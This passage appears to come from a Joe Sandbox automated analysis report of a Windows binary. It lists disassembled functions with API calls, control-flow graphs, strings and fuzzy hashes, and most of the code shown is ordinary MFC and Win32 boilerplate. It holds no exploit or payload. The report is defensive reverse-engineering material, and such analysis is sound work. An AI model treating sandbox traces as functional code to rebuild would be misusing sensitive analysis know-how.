                                                                              • Opcode Fuzzy Hash: 1986b27fd8149e0f62a8e7d8295d5c3cdd2f8b222e083e19466f18e4a23f1a8b
                                                                              • Instruction Fuzzy Hash: A641AF75500204AFDB26DF68D889A697BF8FF4A305F04946AE852EB244DB75B904CB50
                                                                              Function 00E87949 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 246COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • __EH_prolog3_GS.LIBCMT ref: 00E87996
                                                                              • CoCreateGuid.COMBASE(?,00000000,00000000,00000030,?,?,?,?,80070057,00000000,?,00E8772F,?,?,?), ref: 00E879F3
                                                                              • _strlen.LIBCMT ref: 00E87A71
                                                                              • _strlen.LIBCMT ref: 00E87A87
                                                                              • _strlen.LIBCMT ref: 00E87ABF
                                                                              • SysFreeString.OLEAUT32(?), ref: 00E87BE9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: _strlen$CreateFreeGuidH_prolog3_String
                                                                              • String ID: %08lX-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X$RestartByRestartManager
                                                                              • API String ID: 1721273623-5890034
                                                                              • Opcode ID: 69fff351226ecd3062b52a512d0b70b56c6586f0c81509055c08a85cd9126761
                                                                              • Instruction ID: f408dd911710887955e68d233d03d5fac91620095245a30d02889b66c0638405
                                                                              • Opcode Fuzzy Hash: 69fff351226ecd3062b52a512d0b70b56c6586f0c81509055c08a85cd9126761
                                                                              • Instruction Fuzzy Hash: 3A918371A00119AFCB06EBA4D895EFEBBF9BF09310F141068F549B7292DB359D40CB60
                                                                              Function 00EA7B94 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 33registrylibraryloaderCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 420 ea7b94-ea7b9f 421 ea7bcc-ea7bd3 DecodePointer 420->421 422 ea7ba1-ea7bae GetModuleHandleW 420->422 425 ea7bd5-ea7bd7 421->425 423 ea7beb 422->423 424 ea7bb0-ea7bca GetProcAddress EncodePointer 422->424 427 ea7bf0-ea7bf2 423->427 424->425 425->423 426 ea7bd9-ea7be9 RegisterApplicationRestart 425->426 426->427
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00E87C22,?,?), ref: 00EA7BA6
                                                                              • GetProcAddress.KERNEL32(00000000,RegisterApplicationRestart), ref: 00EA7BB6
                                                                              • EncodePointer.KERNEL32(00000000,?,?,00E87C22,?,?), ref: 00EA7BBF
                                                                              • DecodePointer.KERNEL32(9D2B4F6C,?,?,00E87C22,?,?), ref: 00EA7BCD
                                                                              • RegisterApplicationRestart.KERNEL32(?,?,00E87C22,?,?), ref: 00EA7BE7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: Pointer$AddressApplicationDecodeEncodeHandleModuleProcRegisterRestart
                                                                              • String ID: RegisterApplicationRestart$kernel32.dll
                                                                              • API String ID: 2334171955-1259503209
                                                                              • Opcode ID: 92d14b0aad1b77f7a9f1bafcebde9288a446c517fcff3be5b490414da125d0dd
                                                                              • Instruction ID: c1c14f77d03beba404e0a7e55a8a6b816e95c1fd0a218725ccef297834d75951
                                                                              • Opcode Fuzzy Hash: 92d14b0aad1b77f7a9f1bafcebde9288a446c517fcff3be5b490414da125d0dd
                                                                              • Instruction Fuzzy Hash: 7DF05E75904215AF8B236B649C58C5B3FA9FF4DB94B009025FC86EE314DB3AE8008BA0
                                                                              Function 00E95AF2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 146COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 593 e95af2-e95b47 call e9d4e7 * 2 call e9e732 * 2 call f1dd7c 607 e95b49-e95b4b 593->607 608 e95b50-e95b79 593->608 609 e95cd4-e95cd9 call fcba13 607->609 608->607 615 e95b7b-e95ba8 call e995e2 call e81f50 call f1e356 608->615 622 e95beb-e95bfe call e9eaa6 615->622 623 e95baa-e95bdf call f1e307 call f1e6a0 call f1e350 call f1e342 615->623 628 e95c00 622->628 629 e95c03-e95c11 call e964e9 622->629 623->622 641 e95be1-e95be8 GlobalLock 623->641 628->629 634 e95c16-e95c54 call e82050 629->634 642 e95c88-e95c8f call e9edc6 634->642 643 e95c56-e95c70 634->643 641->622 647 e95c91-e95ca1 642->647 648 e95ca5-e95caa 642->648 643->642 655 e95c72-e95c84 643->655 647->648 649 e95cbb-e95cbd 648->649 650 e95cac-e95cb0 648->650 653 e95ccd-e95cd1 649->653 654 e95cbf-e95cc7 GlobalUnlock GlobalFree 649->654 650->649 652 e95cb2-e95cb9 DestroyWindow 650->652 652->649 653->609 654->653 655->642
                                                                              APIs
                                                                              • GlobalLock.KERNEL32(00000000), ref: 00E95BE2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: GlobalLock
                                                                              • String ID: b:$y
                                                                              • API String ID: 2848605275-3376816535
                                                                              • Opcode ID: d970e8c3afee39b5aa6a38f364a02384372607296b33ac0e11e61bfbe6a3ebde
                                                                              • Instruction ID: 1b0b0874c60358313d568cff44fe1b13bf225bb7f177a201d3153112905dc63c
                                                                              • Opcode Fuzzy Hash: d970e8c3afee39b5aa6a38f364a02384372607296b33ac0e11e61bfbe6a3ebde
                                                                              • Instruction Fuzzy Hash: 2D518131E00619EFCF16DFA4C995AEEBBB4BF08314F145059E911BB291DB38AD41CB91
                                                                              Function 00EA2B54 Relevance: 10.6, APIs: 7, Instructions: 127windowCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 658 ea2b54-ea2b6e 659 ea2b7c 658->659 660 ea2b70-ea2b7a call ea562b 658->660 662 ea2b7e-ea2b93 GetParent call e9be4c 659->662 660->659 660->662 666 ea2b96-ea2b9a 662->666 667 ea2c18 call e9c071 666->667 668 ea2b9c-ea2bad PeekMessageA 666->668 672 ea2c1d-ea2c1f 667->672 670 ea2baf-ea2bb1 668->670 671 ea2c15 668->671 673 ea2bb3-ea2bc5 call ea5c5c UpdateWindow 670->673 674 ea2bc7-ea2bcb 670->674 671->667 675 ea2cb2-ea2cb9 call e86fda 672->675 676 ea2c25-ea2c27 672->676 673->674 678 ea2be8-ea2bec 674->678 679 ea2bcd-ea2bd2 674->679 694 ea2cbc-ea2cc0 675->694 680 ea2c29-ea2c33 676->680 681 ea2c52-ea2c68 676->681 685 ea2bee-ea2c02 SendMessageA 678->685 686 ea2c04-ea2c09 678->686 679->678 684 ea2bd4-ea2bd6 679->684 687 ea2c3e-ea2c50 call ea5c5c UpdateWindow 680->687 688 ea2c35-ea2c3c 680->688 698 ea2c6a-ea2c75 call e9bfdc 681->698 699 ea2ca9-ea2cb0 681->699 684->678 690 ea2bd8-ea2be2 SendMessageA 684->690 685->686 691 ea2c0b 685->691 692 ea2c0e-ea2c13 686->692 687->681 688->681 688->687 690->678 691->692 692->668 692->671 702 ea2c77-ea2c83 698->702 703 ea2c85 698->703 699->694 704 ea2c88-ea2c9b PeekMessageA 702->704 703->704 704->667 705 ea2ca1-ea2ca4 704->705 705->666
                                                                              APIs
                                                                              • GetParent.USER32(?), ref: 00EA2B81
                                                                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00EA2BA5
                                                                              • UpdateWindow.USER32(?), ref: 00EA2BBF
                                                                              • SendMessageA.USER32(?,00000121,?,?), ref: 00EA2BE2
                                                                              • SendMessageA.USER32(?,0000036A,00000000,?), ref: 00EA2BF9
                                                                              • UpdateWindow.USER32(?), ref: 00EA2C4A
                                                                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00EA2C93
                                                                                • Part of subcall function 00EA562B: GetWindowLongA.USER32(00000000,000000F0), ref: 00EA5638
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                              • String ID:
                                                                              • API String ID: 2853195852-0
                                                                              • Opcode ID: ddea68b655a59d48f69488a9732e8895c963106b67911a5aead4c9e20aff8cda
                                                                              • Instruction ID: 09be883347867ce2d1e3f153151e71d776d700a06c4e16767f33aa9d4012e21c
                                                                              • Opcode Fuzzy Hash: ddea68b655a59d48f69488a9732e8895c963106b67911a5aead4c9e20aff8cda
                                                                              • Instruction Fuzzy Hash: D741A131B00205ABDB229FA9CD45B9DFBB4BF0A768F10906CEA41BE191D7B5BD409B50
                                                                              Function 00E8839A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 118libraryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 706 e8839a-e883b7 call fcbb90 709 e883bd-e883c4 706->709 710 e88542-e88544 706->710 709->710 711 e883ca-e883e9 call e88348 709->711 712 e88545-e88556 710->712 711->712 715 e883ef-e883f7 711->715 716 e883fd-e88415 call e882f6 715->716 717 e884f2-e88506 call e880b7 715->717 716->712 723 e8841b-e88431 716->723 717->710 722 e88508-e8852d call e88182 717->722 727 e8852f-e88530 LoadLibraryW 722->727 728 e88536-e8853d call e88559 722->728 723->712 731 e88437-e88452 GetModuleFileNameW 723->731 727->728 728->710 731->712 732 e88458-e8845a 731->732 733 e88469-e884a5 call e880fa 732->733 734 e8845c-e88464 SetLastError 732->734 736 e884aa-e884b3 733->736 734->712 737 e884e8 736->737 738 e884b5-e884c0 GetLastError 736->738 737->717 739 e884e0-e884e2 738->739 740 e884c2-e884c7 738->740 739->737 740->739 741 e884c9-e884ce 740->741 741->739 742 e884d0-e884d5 741->742 742->739 743 e884d7-e884da 742->743 743->739 744 e884dc-e884de 743->744 744->712 744->739
                                                                              APIs
                                                                                • Part of subcall function 00E88348: QueryActCtxW.KERNEL32(?,00E883E7,80000010,0105A008,00000000,00000001,?,00000008,00000000,01046E88,00000268,00E882AB,?,?,00E96518,00000000), ref: 00E88393
                                                                              • LoadLibraryW.KERNEL32(Comctl32.dll,00000000,00000000,00000002,Comctl32.dll,00000040), ref: 00E88530
                                                                                • Part of subcall function 00E882F6: DeactivateActCtx.KERNEL32(?,00E88161,01003E28,0105FD94,DeactivateActCtx,00000000,?,00E96590,00000000,00000000,00E96546), ref: 00E88317
                                                                                • Part of subcall function 00E882F6: GetProcAddress.KERNEL32(00000000,00000000), ref: 00E88324
                                                                              • GetModuleFileNameW.KERNEL32(?,?,00000105,?,00E96518,00000000,01047AD0,00000010,00E95C16,?,?,?,00E958B7,00000000), ref: 00E8844A
                                                                              • SetLastError.KERNEL32(0000006F,?,00E96518,00000000,01047AD0,00000010,00E95C16,?,?,?,00E958B7,00000000), ref: 00E8845E
                                                                              • GetLastError.KERNEL32(00000020), ref: 00E884B5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$AddressDeactivateFileLibraryLoadModuleNameProcQuery
                                                                              • String ID: Comctl32.dll$GetModuleHandleExW
                                                                              • API String ID: 1356011737-1171143627
                                                                              • Opcode ID: 310b5924981dbe6cec5e75c5ebdb47ea9c8546f2745e602f3d6113753833ab8d
                                                                              • Instruction ID: 9fc52a3c2e5637ee87a9540aacbb5b5cf38bb5f8cbbee97a525f607d61e47146
                                                                              • Opcode Fuzzy Hash: 310b5924981dbe6cec5e75c5ebdb47ea9c8546f2745e602f3d6113753833ab8d
                                                                              • Instruction Fuzzy Hash: D141C771A006159ADB71BB64DE89B9A76B8FB44718F901296E81CF61C0DF798E80CF10
                                                                              Function 00E95E37 Relevance: 10.6, APIs: 7, Instructions: 102COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 781 e95e37-e95e4e call e9edc6 784 e95ebc-e95ed5 call e9eaa6 call ea022a call e95d59 781->784 785 e95e50-e95e58 GetDesktopWindow 781->785 797 e95eda-e95edc 784->797 785->784 786 e95e5a-e95e63 IsWindowEnabled 785->786 786->784 789 e95e65-e95e80 EnableWindow call e867a6 786->789 794 e95eb9 789->794 795 e95e82-e95e99 789->795 794->784 795->794 811 e95e9b-e95ea7 call ea579d 795->811 799 e95ede-e95ee4 797->799 800 e95f05-e95f38 797->800 799->800 802 e95ee6-e95f00 call e9d4e7 call ea022a call e95d59 799->802 803 e95f3a-e95f3f call ea50bb 800->803 804 e95f44-e95f46 800->804 802->800 803->804 808 e95f48-e95f4b EnableWindow 804->808 809 e95f51-e95f53 804->809 808->809 812 e95f55-e95f5e GetActiveWindow 809->812 813 e95f67-e95f86 call e963a8 809->813 811->794 821 e95ea9-e95eb2 call ea50bb 811->821 812->813 816 e95f60-e95f61 SetActiveWindow 812->816 827 e95f88-e95f8b FreeResource 813->827 828 e95f91-e95f99 call fcba13 813->828 816->813 821->794 827->828
                                                                              APIs
                                                                              • GetDesktopWindow.USER32 ref: 00E95E50
                                                                              • IsWindowEnabled.USER32 ref: 00E95E5B
                                                                              • EnableWindow.USER32(?,00000000), ref: 00E95E67
                                                                                • Part of subcall function 00EA579D: IsWindowEnabled.USER32(?), ref: 00EA57A8
                                                                                • Part of subcall function 00EA50BB: EnableWindow.USER32(?,?), ref: 00EA50CC
                                                                              • EnableWindow.USER32(?,00000001), ref: 00E95F4B
                                                                              • GetActiveWindow.USER32 ref: 00E95F55
                                                                              • SetActiveWindow.USER32(?,?,00000001), ref: 00E95F61
                                                                              • FreeResource.KERNEL32(?), ref: 00E95F8B
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Enable$ActiveEnabled$DesktopFreeResource
                                                                              • String ID:
                                                                              • API String ID: 3061593347-0
                                                                              • Opcode ID: 9af7ba6c12ba029647b237e6709256fb894db10ec8baaf1c6c5a2bea9b0f3b9e
                                                                              • Instruction ID: c4382f2a499fe7969324ee2215be03d57c6e512d0e9afc23262908991e500b52
                                                                              • Opcode Fuzzy Hash: 9af7ba6c12ba029647b237e6709256fb894db10ec8baaf1c6c5a2bea9b0f3b9e
                                                                              • Instruction Fuzzy Hash: F5319272E01715EFCF22ABA1C889BBE7BB5BF48715F041019E845B7291CB3A5D40CBA0
                                                                              Function 00E9EAC0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 65threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetCurrentThreadId.KERNEL32 ref: 00E9EACE
                                                                              • SetWindowsHookExA.USER32(00000005,00EA35EA,00000000,00000000), ref: 00E9EADE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentHookThreadWindows
                                                                              • String ID: HtmlHelpA$hhctrl.ocx
                                                                              • API String ID: 1904029216-63838506
                                                                              • Opcode ID: 5c28df47ebf65adc996b1fdd1ff6b379d9903bed98a7415856ad9c7b47b9e987
                                                                              • Instruction ID: cc0d89f63888b9f1741eaa18cdb48104d8622c95bf3bf092409ac95d606534bc
                                                                              • Opcode Fuzzy Hash: 5c28df47ebf65adc996b1fdd1ff6b379d9903bed98a7415856ad9c7b47b9e987
                                                                              • Instruction Fuzzy Hash: 8011D331600705ABDF32AFA1DC05B5B7BA5FB04765F00952AFB46AA690DB72E8508B60
                                                                              Function 00F5254A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __EH_prolog3.LIBCMT ref: 00F52551
                                                                                • Part of subcall function 00F3D58C: EnterCriticalSection.KERNEL32(01063210,?,?,?,?,00F5258E,00000003,?,?,?,00000004,00F53D30,?,?,?,00E81263), ref: 00F3D5BD
                                                                                • Part of subcall function 00F3D58C: InitializeCriticalSection.KERNEL32(00000000,?,?,?,?,00F5258E,00000003,?,?,?,00000004,00F53D30,?,?,?,00E81263), ref: 00F3D5D3
                                                                                • Part of subcall function 00F3D58C: LeaveCriticalSection.KERNEL32(01063210,?,?,?,?,00F5258E,00000003,?,?,?,00000004,00F53D30,?,?,?,00E81263), ref: 00F3D5E1
                                                                                • Part of subcall function 00F3D58C: EnterCriticalSection.KERNEL32(00000000,?,?,?,00F5258E,00000003,?,?,?,00000004,00F53D30,?,?,?,00E81263), ref: 00F3D5EE
                                                                              • GetProfileIntA.KERNEL32(windows,DragMinDist,00000002), ref: 00F525A4
                                                                              • GetProfileIntA.KERNEL32(windows,DragDelay,000000C8), ref: 00F525BA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$EnterProfile$H_prolog3InitializeLeave
                                                                              • String ID: DragDelay$DragMinDist$windows
                                                                              • API String ID: 3965097884-2101198082
                                                                              • Opcode ID: 89522221896944c136e7537ae236cdf8c880c84eef8955002114a3c25c345143
                                                                              • Instruction ID: 4e8e86148ac7d14fe87059f1fa3ad73cc8e12fc8a868967b9673f43c2250264b
                                                                              • Opcode Fuzzy Hash: 89522221896944c136e7537ae236cdf8c880c84eef8955002114a3c25c345143
                                                                              • Instruction Fuzzy Hash: 38011AB0941B149FD7F6DF24994670ABAE0BB08B00F40952EF589DB655EBBD96008F44
                                                                              Function 00E86200 Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FindResourceW.KERNEL32(00000000,?,00000006,?,?,?,?,?,?,00E85FE0,-00000010,?,?,?,00000000,00FF50D8), ref: 00E8622E
                                                                              • LoadResource.KERNEL32(00000000,00000000,?,?,?,?,00E85FE0,-00000010,?,?,?,00000000,00FF50D8,000000FF,?,00E87632), ref: 00E86241
                                                                              • LockResource.KERNEL32(00000000,?,?,?,?,00E85FE0,-00000010,?,?,?,00000000,00FF50D8,000000FF,?,00E87632,0103BF68), ref: 00E86250
                                                                              • SizeofResource.KERNEL32(00000000,?,?,?,?,?,00E85FE0,-00000010,?,?,?,00000000,00FF50D8,000000FF,?,00E87632), ref: 00E86264
                                                                              • WideCharToMultiByte.KERNEL32(00000003,00000000,00000002,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00E85FE0,-00000010,?,?), ref: 00E862A5
                                                                              • WideCharToMultiByte.KERNEL32(00000003,00000000,00000002,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00E85FE0,-00000010,?,?), ref: 00E862E3
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: Resource$ByteCharMultiWide$FindLoadLockSizeof
                                                                              • String ID:
                                                                              • API String ID: 1289833662-0
                                                                              • Opcode ID: 16166169b7cc417925592e3728253c4c3fcac7756af32cc063e4c39a7764bc01
                                                                              • Instruction ID: 6947ac307682ce306f2bf07dd107c8549675c6187ac792ff8733993680d2d75a
                                                                              • Opcode Fuzzy Hash: 16166169b7cc417925592e3728253c4c3fcac7756af32cc063e4c39a7764bc01
                                                                              • Instruction Fuzzy Hash: 58310476600614AFDB32AB58DC45B7AB7ACEB91714F10015AFA89EF284DA75FC008761
                                                                              Function 00E8326C Relevance: 6.1, APIs: 4, Instructions: 120windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • AppendMenuA.USER32(?,00000800,00000000,00000000), ref: 00E832B2
                                                                              • AppendMenuA.USER32(?,00000000,00000010,?), ref: 00E832BF
                                                                              • SendMessageA.USER32(?,00000080,00000001,?), ref: 00E832F6
                                                                              • SendMessageA.USER32(00000000,00000080,00000000,?), ref: 00E83308
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
